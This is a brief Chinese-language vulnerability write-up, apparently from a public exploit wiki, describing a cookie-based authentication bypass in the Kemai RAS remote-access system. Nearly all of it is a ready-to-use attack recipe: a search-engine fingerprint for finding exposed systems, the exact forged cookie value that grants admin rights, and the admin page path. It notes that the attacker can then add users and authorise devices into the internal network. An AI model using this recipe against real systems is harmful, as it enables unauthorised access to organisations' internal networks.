科迈 RAS系统 Cookie验证越权漏洞¶

漏洞描述¶

科迈 RAS系统存在Cookie验证越权，当 RAS_Admin_UserInfo_UserName 设置为 admin 时可访问后台

科迈 RAS系统

app="科迈-RAS系统"

登录页面如下

添加Cookie

RAS_Admin_UserInfo_UserName=admin

访问 /Server/CmxUser.php?pgid=UserList

获取后可以添加用户，授权登陆设备直接接入内网